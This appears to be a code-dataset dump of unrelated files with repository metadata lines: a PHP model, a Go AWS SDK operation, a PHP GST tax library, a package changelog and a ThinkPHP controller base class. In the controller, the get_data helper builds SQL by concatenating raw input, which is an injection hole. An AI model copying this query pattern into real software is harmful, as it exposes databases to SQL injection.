return $this->container['value'];
}
/**
* Sets value
*
* @param string $value value
*
* @return $this
*/
public function setValue($value)
{
$this->container['value'] = $value;
return $this;
}
/**
* Returns true if offset exists. False otherwise.
*
* @param integer $offset Offset
*
* @return boolean
*/
public function offsetExists($offset)
{
return isset($this->container[$offset]);
}
/**
* Gets offset.
*
* @param integer $offset Offset
*
* @return mixed
*/
public function offsetGet($offset)
{
return isset($this->container[$offset]) ? $this->container[$offset] : null;
}
/**
* Sets value based on offset.
*
* @param integer $offset Offset
* @param mixed $value Value to be set
*
* @return void
*/
public function offsetSet($offset, $value)
{
if (is_null($offset)) {
$this->container[] = $value;
} else {
$this->container[$offset] = $value;
}
}
/**
* Unsets offset.
*
* @param integer $offset Offset
*
* @return void
*/
public function offsetUnset($offset)
{
unset($this->container[$offset]);
}
/**
* Gets the string presentation of the object
*
* @return string
*/
public function __toString()
{
if (defined('JSON_PRETTY_PRINT')) { // use JSON pretty print
return json_encode(
ObjectSerializer::sanitizeForSerialization($this),
JSON_PRETTY_PRINT
);
}
return json_encode(ObjectSerializer::sanitizeForSerialization($this));
}
}
|
PHP
|
MIT
|
FrankHouweling/AzureDevOpsClient/lib/AzureDevOpsClient/ProcessDefinitions/Model/PickListItemModel.php
|
6ad50af0-39fc-4ecf-bde1-da5aac36e60a
|
[{"tag": "EMAIL", "value": "nugetvss@microsoft.com", "start": 421, "end": 443, "context": "\n * OpenAPI spec version: 4.1-preview\n * Contact: nugetvss@microsoft.com\n * Generated by: https://github.com/swagger-api/s"}]
|
[{"tag": "EMAIL", "value": "nugetvss@microsoft.com", "start": 421, "end": 443, "context": "\n * OpenAPI spec version: 4.1-preview\n * Contact: nugetvss@microsoft.com\n * Generated by: https://github.com/swagger-api/s"}]
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package managedblockchain
import (
"context"
"fmt"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/managedblockchain/types"
smithy "github.com/awslabs/smithy-go"
"github.com/awslabs/smithy-go/middleware"
smithyhttp "github.com/awslabs/smithy-go/transport/http"
)
// Creates a proposal for a change to the network that other members of the network
// can vote on, for example, a proposal to add a new member to the network. Any
// member can create a proposal.
func (c *Client) CreateProposal(ctx context.Context, params *CreateProposalInput, optFns ...func(*Options)) (*CreateProposalOutput, error) {
stack := middleware.NewStack("CreateProposal", smithyhttp.NewStackRequest)
options := c.options.Copy()
for _, fn := range optFns {
fn(&options)
}
addawsRestjson1_serdeOpCreateProposalMiddlewares(stack)
awsmiddleware.AddRequestInvocationIDMiddleware(stack)
smithyhttp.AddContentLengthMiddleware(stack)
addResolveEndpointMiddleware(stack, options)
v4.AddComputePayloadSHA256Middleware(stack)
addRetryMiddlewares(stack, options)
addHTTPSignerV4Middleware(stack, options)
awsmiddleware.AddAttemptClockSkewMiddleware(stack)
addClientUserAgent(stack)
smithyhttp.AddErrorCloseResponseBodyMiddleware(stack)
smithyhttp.AddCloseResponseBodyMiddleware(stack)
addIdempotencyToken_opCreateProposalMiddleware(stack, options)
addOpCreateProposalValidationMiddleware(stack)
stack.Initialize.Add(newServiceMetadataMiddleware_opCreateProposal(options.Region), middleware.Before)
addRequestIDRetrieverMiddleware(stack)
addResponseErrorMiddleware(stack)
for _, fn := range options.APIOptions {
if err := fn(stack); err != nil {
return nil, err
}
}
handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack)
result, metadata, err := handler.Handle(ctx, params)
if err != nil {
return nil, &smithy.OperationError{
ServiceID: ServiceID,
OperationName: "CreateProposal",
Err: err,
}
}
out := result.(*CreateProposalOutput)
out.ResultMetadata = metadata
return out, nil
}
type CreateProposalInput struct {
// The type of actions proposed, such as inviting a member or removing a member.
// The types of Actions in a proposal are mutually exclusive. For example, a
// proposal with Invitations actions cannot also contain Removals actions.
//
// This member is required.
Actions *types.ProposalActions
// A unique, case-sensitive identifier that you provide to ensure the idempotency
// of the operation. An idempotent operation completes no more than one time. This
// identifier is required only if you make a service request directly using an HTTP
// client. It is generated automatically if you use an AWS SDK or the AWS CLI.
//
// This member is required.
ClientRequestToken *string
// The unique identifier of the member that is creating the proposal. This
// identifier is especially useful for identifying the member making the proposal
// when multiple members exist in a single AWS account.
//
// This member is required.
MemberId *string
// The unique identifier of the network for which the proposal is made.
//
// This member is required.
NetworkId *string
// A description for the proposal that is visible to voting members, for example,
// "Proposal to add Example Corp. as member."
Description *string
}
type CreateProposalOutput struct {
// The unique identifier of the proposal.
ProposalId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
}
func addawsRestjson1_serdeOpCreateProposalMiddlewares(stack *middleware.Stack) {
stack.Serialize.Add(&awsRestjson1_serializeOpCreateProposal{}, middleware.After)
stack.Deserialize.Add(&awsRestjson1_deserializeOpCreateProposal{}, middleware.After)
}
type idempotencyToken_initializeOpCreateProposal struct {
tokenProvider IdempotencyTokenProvider
}
func (*idempotencyToken_initializeOpCreateProposal) ID() string {
return "OperationIdempotencyTokenAutoFill"
}
func (m *idempotencyToken_initializeOpCreateProposal) HandleInitialize(ctx context.Context, in middleware.InitializeInput, next middleware.InitializeHandler) (
out middleware.InitializeOutput, metadata middleware.Metadata, err error,
) {
if m.tokenProvider == nil {
return next.HandleInitialize(ctx, in)
}
input, ok := in.Parameters.(*CreateProposalInput)
if !ok {
return out, metadata, fmt.Errorf("expected middleware input to be of type *CreateProposalInput ")
}
if input.ClientRequestToken == nil {
t, err := m.tokenProvider.GetIdempotencyToken()
if err != nil {
return out, metadata, err
}
input.ClientRequestToken = &t
}
return next.HandleInitialize(ctx, in)
}
func addIdempotencyToken_opCreateProposalMiddleware(stack *middleware.Stack, cfg Options) {
stack.Initialize.Add(&idempotencyToken_initializeOpCreateProposal{tokenProvider: cfg.IdempotencyTokenProvider}, middleware.Before)
}
func newServiceMetadataMiddleware_opCreateProposal(region string) awsmiddleware.RegisterServiceMetadata {
return awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "managedblockchain",
OperationName: "CreateProposal",
}
}
|
GO
|
Apache-2.0
|
zparnold/aws-sdk-go-v2/service/managedblockchain/api_op_CreateProposal.go
|
7dc436c5-0f87-4c9b-90e1-6d8cfc674d5c
|
[]
|
[]
|
<?php defined('BASEPATH') or exit('No direct script access allowed');
/*
* ==============================================================================
* Author : Sheik
* Email : info@srampos.com
* For : SRAM POS
* Web : http://srammram.com
* ==============================================================================
*/
class Gst
{
public function __construct() {
}
public function __get($var) {
return get_instance()->$var;
}
function summary($rows = [], $return_rows = [], $product_tax = 0, $onCost = false) {
$code = '';
if ($this->Settings->invoice_view > 0 && !empty($rows)) {
$tax_summary = $this->taxSummary($rows, $onCost);
if (!empty($return_rows)) {
$return_tax_summary = $this->taxSummary($return_rows, $onCost);
$tax_summary = $tax_summary + $return_tax_summary;
}
$code = $this->genHTML($tax_summary, $product_tax);
}
return $code;
}
function taxSummary($rows = [], $onCost = false) {
$tax_summary = [];
if (!empty($rows)) {
foreach ($rows as $row) {
if (isset($tax_summary[$row->tax_code])) {
$tax_summary[$row->tax_code]['items'] += $row->unit_quantity;
$tax_summary[$row->tax_code]['tax'] += $row->item_tax;
$tax_summary[$row->tax_code]['amt'] += ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
} else {
$tax_summary[$row->tax_code]['items'] = $row->unit_quantity;
$tax_summary[$row->tax_code]['tax'] = $row->item_tax;
$tax_summary[$row->tax_code]['amt'] = ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
$tax_summary[$row->tax_code]['name'] = $row->tax_name;
$tax_summary[$row->tax_code]['code'] = $row->tax_code;
$tax_summary[$row->tax_code]['rate'] = $row->tax_rate;
}
}
}
return $tax_summary;
}
function genHTML($tax_summary = [], $product_tax = 0) {
$html = '';
if (!empty($tax_summary)) {
$html .= '<h4 style="font-weight:bold;">' . lang('tax_summary') . '</h4>';
$html .= '<table class="table table-bordered table-striped print-table order-table table-condensed"><thead><tr><th>' . lang('name') . '</th><th>' . lang('code') . '</th><th>' . lang('qty') . '</th><th>' . lang('tax_excl') . '</th><th>' . lang('tax_amt') . '</th></tr></td><tbody>';
foreach ($tax_summary as $summary) {
$html .= '<tr><td>' . $summary['name'] . '</td><td class="text-center">' . $summary['code'] . '</td><td class="text-center">' . $this->sma->formatQuantity($summary['items']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['amt']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['tax']) . '</td></tr>';
}
$html .= '</tbody></tfoot>';
$html .= '<tr class="active"><th colspan="4" class="text-right">' . lang('total_tax_amount') . '</th><th class="text-right">' . $this->sma->formatMoney($product_tax) . '</th></tr>';
$html .= '</tfoot></table>';
}
return $html;
}
function calculteIndianGST($item_tax, $state, $tax_details) {
if ($this->Settings->indian_gst) {
$cgst = $sgst = $igst = 0;
if ($state) {
$gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate/2), 0).'%' : $this->sma->formatDecimal(($tax_details->rate/2), 0);
$cgst = $this->sma->formatDecimal(($item_tax / 2), 4);
$sgst = $this->sma->formatDecimal(($item_tax / 2), 4);
} else {
$gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate), 0).'%' : $this->sma->formatDecimal(($tax_details->rate), 0);
$igst = $item_tax;
}
return ['gst' => $gst, 'cgst' => $cgst, 'sgst' => $sgst, 'igst' => $igst];
}
return [];
}
function getIndianStates($blank = false) {
$istates = [
'AN' => 'Andaman & Nicobar',
'AP' => 'Andhra Pradesh',
'AR' => 'Arunachal Pradesh',
'AS' => 'Assam',
'BR' => 'Bihar',
'CH' => 'Chandigarh',
'CT' => 'Chhattisgarh',
'DN' => 'Dadra and Nagar Haveli',
'DD' => 'Daman & Diu',
'DL' => 'Delhi',
'GA' => 'Goa',
'GJ' => 'Gujarat',
'HR' => 'Haryana',
'HP' => 'Himachal Pradesh',
'JK' => 'Jammu & Kashmir',
'JH' => 'Jharkhand',
'KA' => 'Karnataka',
'KL' => 'Kerala',
'LD' => 'Lakshadweep',
'MP' => 'Madhya Pradesh',
'MH' => 'Maharashtra',
'MN' => 'Manipur',
'ML' => 'Meghalaya',
'MZ' => 'Mizoram',
'NL' => 'Nagaland',
'OR' => 'Odisha',
'PY' => 'Puducherry',
'PB' => 'Punjab',
'RJ' => 'Rajasthan',
'SK' => 'Sikkim',
'TN' => 'Tamil Nadu',
'TR' => 'Tripura',
'UK' => 'Uttarakhand',
'UP' => 'Uttar Pradesh',
'WB' => 'West Bengal',
];
if ($blank) {
array_unshift($istates, lang('select'));
}
return $istates;
}
}
|
PHP
|
MIT
|
srammram/Bhaktamar/application/libraries/Gst.php
|
74a8813b-de64-4e23-97d2-513b5e6bbdf0
|
[{"tag": "NAME", "value": "Sheik", "start": 173, "end": 178, "context": "=================================\n * Author : Sheik\n * Email : info@srampos.com\n * For : "}, {"tag": "EMAIL", "value": "info@srampos.com", "start": 195, "end": 211, "context": "===========\n * Author : Sheik\n * Email : info@srampos.com\n * For : SRAM POS\n * Web : http://s"}]
|
[{"tag": "NAME", "value": "Sheik", "start": 173, "end": 178, "context": "=================================\n * Author : Sheik\n * Email : info@srampos.com\n * For : "}, {"tag": "EMAIL", "value": "info@srampos.com", "start": 195, "end": 211, "context": "===========\n * Author : Sheik\n * Email : info@srampos.com\n * For : SRAM POS\n * Web : http://s"}]
|
# @dusk-network/pagination
## 5.0.5
### Patch Changes
- 8bd8843d: Release
- Updated dependencies [8bd8843d]
- @dusk-network/icon@5.0.5
- @dusk-network/helpers@5.0.5
- @dusk-network/button@5.0.5
- @dusk-network/menu@5.0.5
## 5.0.4
### Patch Changes
- fc9a835e: Release
- Updated dependencies [fc9a835e]
- @dusk-network/icon@5.0.4
- @dusk-network/helpers@5.0.4
- @dusk-network/button@5.0.4
- @dusk-network/menu@5.0.4
## 5.0.3
### Patch Changes
- d19e01e9: Release
- Updated dependencies [d19e01e9]
- @dusk-network/icon@5.0.3
- @dusk-network/helpers@5.0.3
- @dusk-network/button@5.0.3
- @dusk-network/menu@5.0.3
## 5.0.2
### Patch Changes
- bd6220d3: Release
- Updated dependencies [bd6220d3]
- @dusk-network/icon@5.0.2
- @dusk-network/helpers@5.0.2
- @dusk-network/button@5.0.2
- @dusk-network/menu@5.0.2
## 5.0.1
### Patch Changes
- f47dbc9c: Release
- Updated dependencies [f47dbc9c]
- @dusk-network/icon@5.0.1
- @dusk-network/helpers@5.0.1
- @dusk-network/button@5.0.1
- @dusk-network/menu@5.0.1
## 5.0.0
### Minor Changes
- 5a02600a: Release
### Patch Changes
- Updated dependencies [5a02600a]
- @dusk-network/icon@5.0.0
- @dusk-network/helpers@5.0.0
- @dusk-network/button@5.0.0
- @dusk-network/menu@5.0.0
## 4.6.12
### Patch Changes
- 7e97eb52: Release 4.6.12
- Updated dependencies [7e97eb52]
- @dusk-network/icon@4.6.12
- @dusk-network/helpers@4.6.12
- @dusk-network/button@4.6.12
- @dusk-network/menu@4.6.12
## 4.6.11
### Patch Changes
- 771245ec: Release
- Updated dependencies [771245ec]
- @dusk-network/icon@4.6.11
- @dusk-network/helpers@4.6.11
- @dusk-network/button@4.6.11
- @dusk-network/menu@4.6.11
## 4.6.10
### Patch Changes
- 85081744: Release
- Updated dependencies [85081744]
- @dusk-network/icon@4.6.10
- @dusk-network/helpers@4.6.10
- @dusk-network/button@4.6.10
- @dusk-network/menu@4.6.10
## 4.6.9
### Patch Changes
- fe592f88: Release
- Updated dependencies [fe592f88]
- @dusk-network/icon@4.6.9
- @dusk-network/helpers@4.6.9
- @dusk-network/button@4.6.9
- @dusk-network/menu@4.6.9
## 4.6.8
### Patch Changes
- c33aa088: Release
- Updated dependencies [c33aa088]
- @dusk-network/icon@4.6.8
- @dusk-network/helpers@4.6.8
- @dusk-network/button@4.6.8
- @dusk-network/menu@4.6.8
## 4.6.7
### Patch Changes
- 5afbc274: Release
- Updated dependencies [5afbc274]
- @dusk-network/icon@4.6.7
- @dusk-network/helpers@4.6.7
- @dusk-network/button@4.6.7
- @dusk-network/menu@4.6.7
## 4.6.6
### Patch Changes
- a5caefeb: Release
- Updated dependencies [a5caefeb]
- @dusk-network/icon@4.6.6
- @dusk-network/helpers@4.6.6
- @dusk-network/button@4.6.6
- @dusk-network/menu@4.6.6
## 4.6.5
### Patch Changes
- 10b60c57: Release
- Updated dependencies [10b60c57]
- @dusk-network/icon@4.6.5
- @dusk-network/helpers@4.6.5
- @dusk-network/button@4.6.5
- @dusk-network/menu@4.6.5
## 4.6.4
### Patch Changes
- 8c74f26d: Release
- Updated dependencies [8c74f26d]
- @dusk-network/icon@4.6.4
- @dusk-network/helpers@4.6.4
- @dusk-network/button@4.6.4
- @dusk-network/menu@4.6.4
## 4.6.3
### Patch Changes
- 0dafd544: Release
- Updated dependencies [0dafd544]
- @dusk-network/icon@4.6.3
- @dusk-network/helpers@4.6.3
- @dusk-network/button@4.6.3
- @dusk-network/menu@4.6.3
## 4.6.2
### Patch Changes
- 182f1ea6: Release
- Updated dependencies [182f1ea6]
- @dusk-network/icon@4.6.2
- @dusk-network/helpers@4.6.2
- @dusk-network/button@4.6.2
- @dusk-network/menu@4.6.2
## 4.6.1
### Patch Changes
- 88042090: Release
- Updated dependencies [88042090]
- @dusk-network/icon@4.6.1
- @dusk-network/helpers@4.6.1
- @dusk-network/button@4.6.1
- @dusk-network/menu@4.6.1
## 4.6.0
### Minor Changes
- 9320f3b5: Release
### Patch Changes
- Updated dependencies [9320f3b5]
- @dusk-network/icon@4.6.0
- @dusk-network/helpers@4.6.0
- @dusk-network/button@4.6.0
- @dusk-network/menu@4.6.0
## 4.5.6
### Patch Changes
- 80a609dd: Release
- Updated dependencies [80a609dd]
- @dusk-network/icon@4.5.6
- @dusk-network/helpers@4.5.6
- @dusk-network/button@4.5.6
- @dusk-network/menu@4.5.6
## 4.5.5
### Patch Changes
- d326f7f0: Release
- Updated dependencies [d326f7f0]
- @dusk-network/icon@4.5.5
- @dusk-network/helpers@4.5.5
- @dusk-network/button@4.5.5
- @dusk-network/menu@4.5.5
## 4.5.4
### Patch Changes
- bfca367b: Release
- Updated dependencies [bfca367b]
- @dusk-network/icon@4.5.4
- @dusk-network/helpers@4.5.4
- @dusk-network/button@4.5.4
- @dusk-network/menu@4.5.4
## 4.5.3
### Patch Changes
- 55558e72: Release
- Updated dependencies [55558e72]
- @dusk-network/icon@4.5.3
- @dusk-network/helpers@4.5.3
- @dusk-network/button@4.5.3
- @dusk-network/menu@4.5.3
## 4.5.2
### Patch Changes
- b252568f: Release
- Updated dependencies [b252568f]
- @dusk-network/icon@4.5.2
- @dusk-network/helpers@4.5.2
- @dusk-network/button@4.5.2
- @dusk-network/menu@4.5.2
## 4.5.1
### Patch Changes
- bf08b6df: Release
- Updated dependencies [bf08b6df]
- @dusk-network/icon@4.5.1
- @dusk-network/helpers@4.5.1
- @dusk-network/button@4.5.1
- @dusk-network/menu@4.5.1
## 4.5.0
### Minor Changes
- 023ecf0d: Release
### Patch Changes
- Updated dependencies [023ecf0d]
- @dusk-network/icon@4.5.0
- @dusk-network/helpers@4.5.0
- @dusk-network/button@4.5.0
- @dusk-network/menu@4.5.0
## 4.4.0
### Minor Changes
- ca37e869: Release 4.3.0
### Patch Changes
- Updated dependencies [ca37e869]
- @dusk-network/icon@4.4.0
- @dusk-network/helpers@4.4.0
- @dusk-network/button@4.4.0
- @dusk-network/menu@4.4.0
## 4.3.1
### Patch Changes
- eeac67a4: Release 4.2.1
- Updated dependencies [eeac67a4]
- @dusk-network/icon@4.3.1
- @dusk-network/helpers@4.3.1
- @dusk-network/button@4.3.1
- @dusk-network/menu@4.3.1
## 4.3.0
### Minor Changes
- 7d390f05: Release 4.3.0
### Patch Changes
- Updated dependencies [7d390f05]
- @dusk-network/icon@4.3.0
- @dusk-network/helpers@4.3.0
- @dusk-network/button@4.3.0
- @dusk-network/menu@4.3.0
## 4.2.1
### Patch Changes
- b66edd71: Release 4.2.1
- Updated dependencies [b66edd71]
- @dusk-network/icon@4.2.1
- @dusk-network/helpers@4.2.1
- @dusk-network/button@4.2.1
- @dusk-network/menu@4.2.1
## 4.2.0
### Minor Changes
- 770e3502: Release 4.1.2
### Patch Changes
- Updated dependencies [770e3502]
- @dusk-network/icon@4.2.0
- @dusk-network/helpers@4.2.0
- @dusk-network/button@4.2.0
- @dusk-network/menu@4.2.0
## 4.1.1
### Patch Changes
- 03b53db4: Release 4.1.1
- Updated dependencies [03b53db4]
- @dusk-network/icon@4.1.1
- @dusk-network/helpers@4.1.1
- @dusk-network/button@4.1.1
- @dusk-network/menu@4.1.1
## 4.1.0
### Minor Changes
- b8dfbe58: Release 4.1.0
### Patch Changes
- Updated dependencies [b8dfbe58]
- @dusk-network/icon@4.1.0
- @dusk-network/helpers@4.1.0
- @dusk-network/button@4.1.0
- @dusk-network/menu@4.1.0
## 4.0.6
### Patch Changes
- 72ad415f: Release 4.0.6
- Updated dependencies [72ad415f]
- @dusk-network/icon@4.0.6
- @dusk-network/helpers@4.0.6
- @dusk-network/button@4.0.6
- @dusk-network/menu@4.0.6
## 4.0.5
### Patch Changes
- 2043c055: Release 4.0.4
- Updated dependencies [2043c055]
- @dusk-network/icon@4.0.5
- @dusk-network/helpers@4.0.5
- @dusk-network/button@4.0.5
- @dusk-network/menu@4.0.5
## 4.0.4
### Patch Changes
- 0f6d98e6: Release 4.0.4
- Updated dependencies [0f6d98e6]
- @dusk-network/icon@4.0.4
- @dusk-network/helpers@4.0.4
- @dusk-network/button@4.0.4
- @dusk-network/menu@4.0.4
## 4.0.3
### Patch Changes
- d0bfc346: Release v4.0.3
- Updated dependencies [d0bfc346]
- @dusk-network/icon@4.0.3
- @dusk-network/helpers@4.0.3
- @dusk-network/button@4.0.3
- @dusk-network/menu@4.0.3
## 4.0.2
### Patch Changes
- b7876f76: Releasing v4.0.2
- Updated dependencies [b7876f76]
- @dusk-network/icon@4.0.2
- @dusk-network/helpers@4.0.2
- @dusk-network/button@4.0.2
- @dusk-network/menu@4.0.2
## 4.0.1
### Patch Changes
- 3d02510e: Patch release for some boilerplate issues
- Updated dependencies [3d02510e]
- @dusk-network/icon@4.0.1
- @dusk-network/helpers@4.0.1
- @dusk-network/button@4.0.1
- @dusk-network/menu@4.0.1
## 4.0.0
### Major Changes
- 11a1f850: Release V4
### Minor Changes
- a86c725b: Updating all packages to node modules format
### Patch Changes
- Updated dependencies [11a1f850]
- Updated dependencies [a86c725b]
- @dusk-network/icon@4.0.0
- @dusk-network/helpers@4.0.0
- @dusk-network/button@4.0.0
- @dusk-network/menu@4.0.0
## 3.0.12
### Patch Changes
- 66d1852b: Minor fixes for search-list component
- Updated dependencies [66d1852b]
- @dusk-network/icon@3.0.12
- @dusk-network/helpers@3.0.12
- @dusk-network/button@3.0.12
- @dusk-network/menu@3.0.12
## 3.0.11
### Patch Changes
- e82126be: testing changesets
- Updated dependencies [e82126be]
- @dusk-network/icon@3.0.11
- @dusk-network/helpers@3.0.11
- @dusk-network/button@3.0.11
- @dusk-network/menu@3.0.11
## 3.0.10
### Patch Changes
- 3bdf6fcd: testing changesets
- Updated dependencies [3bdf6fcd]
- @dusk-network/icon@3.0.10
- @dusk-network/helpers@3.0.10
- @dusk-network/button@3.0.10
- @dusk-network/menu@3.0.10
## 3.0.9
### Patch Changes
- ddcc6129: testing changesets
- Updated dependencies [ddcc6129]
- @dusk-network/icon@3.0.9
- @dusk-network/helpers@3.0.9
- @dusk-network/button@3.0.9
- @dusk-network/menu@3.0.9
## 3.0.8
### Patch Changes
- 59509914: testing changesets
- 0258743d: testing changesets ci
- Updated dependencies [59509914]
- Updated dependencies [0258743d]
- @dusk-network/icon@3.0.8
- @dusk-network/helpers@3.0.8
- @dusk-network/button@3.0.8
- @dusk-network/menu@3.0.8
## 3.0.7
### Patch Changes
- 9fa40eb7: testing changesets
- Updated dependencies [9fa40eb7]
- @dusk-network/icon@3.0.7
- @dusk-network/helpers@3.0.7
- @dusk-network/button@3.0.7
- @dusk-network/menu@3.0.7
## 3.0.6
### Patch Changes
- dc22a3aa: testing changesets
- Updated dependencies [dc22a3aa]
- @dusk-network/icon@3.0.6
- @dusk-network/helpers@3.0.6
- @dusk-network/button@3.0.6
- @dusk-network/menu@3.0.6
## 3.0.5
### Patch Changes
- 006ffc63: testing changesets
- Updated dependencies [006ffc63]
- @dusk-network/icon@3.0.5
- @dusk-network/helpers@3.0.5
- @dusk-network/button@3.0.5
- @dusk-network/menu@3.0.5
## 3.0.4
### Patch Changes
- 83b76ba8: testing changesets
- Updated dependencies [83b76ba8]
- @dusk-network/icon@3.0.4
- @dusk-network/helpers@3.0.4
- @dusk-network/button@3.0.4
- @dusk-network/menu@3.0.4
## 3.0.3
### Patch Changes
- 365e4295: testing changesets
- Updated dependencies [365e4295]
- @dusk-network/icon@3.0.3
- @dusk-network/helpers@3.0.3
- @dusk-network/button@3.0.3
- @dusk-network/menu@3.0.3
## 3.0.2
### Patch Changes
- d9360f5c: testing changesets
- Updated dependencies [d9360f5c]
- @dusk-network/icon@3.0.2
- @dusk-network/helpers@3.0.2
- @dusk-network/button@3.0.2
- @dusk-network/menu@3.0.2
## 3.0.1
### Patch Changes
- ac84fdab: testing changesets
- 33c8fedb: testing changesets
- dd790adb: testing changesets
- Updated dependencies [ac84fdab]
- Updated dependencies [33c8fedb]
- Updated dependencies [dd790adb]
- @dusk-network/icon@3.0.1
- @dusk-network/helpers@3.0.1
- @dusk-network/button@3.0.1
- @dusk-network/menu@3.0.1
## 0.0.1
### Patch Changes
- a10ea514: testing changesets
- 2b3bda0b: testing changesets
- 6d417df2: adding another changest
- Updated dependencies [a10ea514]
- Updated dependencies [2b3bda0b]
- Updated dependencies [6d417df2]
- @dusk-network/icon@0.0.1
- @dusk-network/helpers@0.0.1
- @dusk-network/button@0.0.1
- @dusk-network/menu@0.0.1
|
Markdown
|
MPL-2.0
|
dusk-network/dusk-ui-kit/packages/molecules/pagination/CHANGELOG.md
|
4446a1a8-e05e-4025-82cd-d8ffd7cc4349
|
[]
|
[]
|
<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK IT ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2014 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------
namespace Think;
/**
* ThinkPHP 控制器基类 抽象类
*/
abstract class Controller {
public function get_data($tablename,$keyname,$key)
{
$obj=M($tablename);
$data=$obj->where($keyname.'="'.$key.'"')->select();
return $data;
}
// 写入数据库
// $tablename表名称,字符串
// $data写入数据,字符串数组
// $redirectcontroller跳转的控制名,字符串
// $redirectpage跳转的页面,字符串
// $tips成功提示信息
public function write_db($tablename,$data,$redirectcontroller,$redirectpage,$tips)
{
$obj=M($tablename);
$obj->data($data)->add();
if (!$obj->create($data)) {
//验证没有通过 输出错误提示信息
$this->error($obj->getError());
exit();
}else{
$this->success($tips,U($redirectcontroller.'/'.$redirectpage));
}
}
// 按秒计算时间差,显示频繁使用AJAX POST
public function postLimit()
{
if(isset($_SESSION['postTime'])){
$lastPostTime=session('postTime');
$now=date(YmdHis);
$diff=strtotime($now)-strtotime(I('session.postTime'));
session('postTime',date(YmdHis));
return $diff;
}else{
session('postTime',date(YmdHis));
return 3;
}
}
//用户权限校验
public function userauth()
{
session(null);
redirect(U('Login/index'));
}
/**
* 视图实例对象
* @var view
* @access protected
*/
protected $view = null;
/**
* 控制器参数
* @var config
* @access protected
*/
protected $config = array();
/**
* 架构函数 取得模板对象实例
* @access public
*/
public function __construct() {
Hook::listen('action_begin',$this->config);
//实例化视图类
$this->view = Think::instance('Think\View');
//控制器初始化
if(method_exists($this,'_initialize'))
$this->_initialize();
}
/**
* 模板显示 调用内置的模板引擎显示方法,
* @access protected
* @param string $templateFile 指定要调用的模板文件
* 默认为空 由系统自动定位模板文件
* @param string $charset 输出编码
* @param string $contentType 输出类型
* @param string $content 输出内容
* @param string $prefix 模板缓存前缀
* @return void
*/
protected function display($templateFile='',$charset='',$contentType='',$content='',$prefix='') {
$this->view->display($templateFile,$charset,$contentType,$content,$prefix);
}
/**
* 输出内容文本可以包括Html 并支持内容解析
* @access protected
* @param string $content 输出内容
* @param string $charset 模板输出字符集
* @param string $contentType 输出类型
* @param string $prefix 模板缓存前缀
* @return mixed
*/
protected function show($content,$charset='',$contentType='',$prefix='') {
$this->view->display('',$charset,$contentType,$content,$prefix);
}
/**
* 获取输出页面内容
* 调用内置的模板引擎fetch方法,
* @access protected
* @param string $templateFile 指定要调用的模板文件
* 默认为空 由系统自动定位模板文件
* @param string $content 模板输出内容
* @param string $prefix 模板缓存前缀*
* @return string
*/
protected function fetch($templateFile='',$content='',$prefix='') {
return $this->view->fetch($templateFile,$content,$prefix);
}
/**
* 创建静态页面
* @access protected
* @htmlfile 生成的静态文件名称
* @htmlpath 生成的静态文件路径
* @param string $templateFile 指定要调用的模板文件
* 默认为空 由系统自动定位模板文件
* @return string
*/
protected function buildHtml($htmlfile='',$htmlpath='',$templateFile='') {
$content = $this->fetch($templateFile);
$htmlpath = !empty($htmlpath)?$htmlpath:HTML_PATH;
$htmlfile = $htmlpath.$htmlfile.C('HTML_FILE_SUFFIX');
Storage::put($htmlfile,$content,'html');
return $content;
}
/**
* 模板主题设置
* @access protected
* @param string $theme 模版主题
* @return Action
*/
protected function theme($theme){
$this->view->theme($theme);
return $this;
}
/**
* 模板变量赋值
* @access protected
* @param mixed $name 要显示的模板变量
* @param mixed $value 变量的值
* @return Action
*/
protected function assign($name,$value='') {
$this->view->assign($name,$value);
return $this;
}
public function __set($name,$value) {
$this->assign($name,$value);
}
/**
* 取得模板显示变量的值
* @access protected
* @param string $name 模板显示变量
* @return mixed
*/
public function get($name='') {
return $this->view->get($name);
}
public function __get($name) {
return $this->get($name);
}
/**
* 检测模板变量的值
* @access public
* @param string $name 名称
* @return boolean
*/
public function __isset($name) {
return $this->get($name);
}
/**
* 魔术方法 有不存在的操作的时候执行
* @access public
* @param string $method 方法名
* @param array $args 参数
* @return mixed
*/
public function __call($method,$args) {
if( 0 === strcasecmp($method,ACTION_NAME.C('ACTION_SUFFIX'))) {
if(method_exists($this,'_empty')) {
// 如果定义了_empty操作 则调用
$this->_empty($method,$args);
}elseif(file_exists_case($this->view->parseTemplate())){
// 检查是否存在默认模版 如果有直接输出模版
$this->display();
}else{
E(L('_ERROR_ACTION_').':'.ACTION_NAME);
}
}else{
E(__CLASS__.':'.$method.L('_METHOD_NOT_EXIST_'));
return;
}
}
/**
* 操作错误跳转的快捷方法
* @access protected
* @param string $message 错误信息
* @param string $jumpUrl 页面跳转地址
* @param mixed $ajax 是否为Ajax方式 当数字时指定跳转时间
* @return void
*/
protected function error($message='',$jumpUrl='',$ajax=false) {
$this->dispatchJump($message,0,$jumpUrl,$ajax);
}
/**
* 操作成功跳转的快捷方法
* @access protected
* @param string $message 提示信息
* @param string $jumpUrl 页面跳转地址
* @param mixed $ajax 是否为Ajax方式 当数字时指定跳转时间
* @return void
*/
protected function success($message='',$jumpUrl='',$ajax=false) {
$this->dispatchJump($message,1,$jumpUrl,$ajax);
}
/**
* Ajax方式返回数据到客户端
* @access protected
* @param mixed $data 要返回的数据
* @param String $type AJAX返回数据格式
* @param int $json_option 传递给json_encode的option参数
* @return void
*/
protected function ajaxReturn($data,$type='',$json_option=0) {
